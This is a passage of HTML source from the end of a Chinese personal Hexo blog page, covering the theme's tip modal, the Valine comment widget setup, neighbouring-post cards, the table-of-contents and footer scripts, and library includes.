        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#ether">Ethereum</a></li>
                        <!--li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#usdt">USDT-ERC-20</a></li-->
                        <!--li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#usdt"DOGE</a></li-->
                    </ul>
                    <div id="ether">
                        <img src="/medias/reward/ether.png" class="reward-img" alt="Ethereum地址">
                        <!--img src="" class="reward-img" alt="USDT地址"-->
                        <!--img src="" class="reward-img" alt="DOGE地址"-->
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'd4IYbRB8X0l9FzsUCCXeMKhp-MdYXbMMI',
        appKey: 'gebDh2E0ftSgLRT4Sk4REwWB',
        notify: 'true' === 'true',
        verify: 'true' === 'true',
        visitor: 'true' === 'true',
        avatar: 'retro',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '0x2e317c'
    });
</script>

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/12/15/softwareseasonthree/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="好软推荐第三期">
                        
                        <span class="card-title">好软推荐第三期</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            M3U8下载器软件名：N_m3u8DL-CLI
开发者：hilaoda（点击前往TA的GitHub主页）
平台：Windows only
类型：下载器
简介：一款开源免费的命令行流媒体视频下载器，需要借助猫抓插件，功能十分强大
主要功能：

                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-12-15
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E8%BD%AF%E4%BB%B6%E6%8E%A8%E8%8D%90/" class="post-category">
                                    软件推荐
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Android/">
                        <span class="chip bg-color">Android</span>
                    </a>
                    
                    <a href="/tags/Windows/">
                        <span class="chip bg-color">Windows</span>
                    </a>
                    
                    <a href="/tags/%E4%B8%8B%E8%BD%BD%E5%99%A8/">
                        <span class="chip bg-color">下载器</span>
                    </a>
                    
                    <a href="/tags/Linux/">
                        <span class="chip bg-color">Linux</span>
                    </a>
                    
                    <a href="/tags/%E6%B5%81%E5%AA%92%E4%BD%93%E4%B8%8B%E8%BD%BD/">
                        <span class="chip bg-color">流媒体下载</span>
                    </a>
                    
                    <a href="/tags/%E8%85%BE%E8%AE%AFQQ/">
                        <span class="chip bg-color">腾讯QQ</span>
                    </a>
                    
                    <a href="/tags/%E6%95%88%E7%8E%87%E8%BD%AF%E4%BB%B6/">
                        <span class="chip bg-color">效率软件</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/11/02/javascriptaddchildnode/">
                    <div class="card-image">
                        
                        <img src="https://i.loli.net/2020/11/02/xDEmTsIndki7Gq4.jpg" class="responsive-img" alt="利用JavaScript向网页中添加子元素并赋予属性">
                        
                        <span class="card-title">利用JavaScript向网页中添加子元素并赋予属性</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            前些阵子为了解析到恩京书房被隐藏的下载链接就自学了下JavaScript，下面是我的脚本设计思路：
用到的函数：
window.location.href
获取当前窗口的url
document.createElement()
创建子元素

                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-11-02
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%BC%96%E7%A8%8B/" class="post-category">
                                    编程
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%89%8D%E7%AB%AF/">
                        <span class="chip bg-color">前端</span>
                    </a>
                    
                    <a href="/tags/%E7%BC%96%E7%A8%8B/">
                        <span class="chip bg-color">编程</span>
                    </a>
                    
                    <a href="/tags/JavaScript/">
                        <span class="chip bg-color">JavaScript</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>



    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="4889482629"
                   fixed='true'
                   autoplay='false'
                   theme:='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="http://arandintday.github.io" target="_blank">A Randint Day</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "2";
                    var startDate = "26";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/arandintday" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:lzchappytime2@gmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>
	<script src="https://arandintday.github.io/libs/background/three.r95.min.js"></script>
    <script src="https://arandintday.github.io/libs/background/vanta.globe.min.js"></script>

    <!-- Global site tag (gtag.js) - Google Analytics -->


    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    
<div id="vantajs" style="position: fixed; top: 0px; left: 0px; z-index: -1; opacity: 0.7; height:100%; width:100%;"></div>
	<script>
    // Step 3 - Instilize the plugin by #id selector
VANTA.GLOBE({
  el: "#vantajs",
  mouseControls: true,
  touchControls: true,
  minHeight: 200.00,
  minWidth: 200.00,
  scale: 1.00,
  scaleMobile: 1.00,
  color: 0x376cc7,
  backgroundColor: 0xffffff
});

VANTA.GLOBE("#vantajs");


</script>
    

    

    
    
    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    
	

</body>

</html>
